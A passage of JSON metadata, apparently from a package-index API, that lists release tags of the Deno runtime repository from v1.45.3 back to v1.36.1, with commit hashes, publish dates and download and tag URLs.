.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/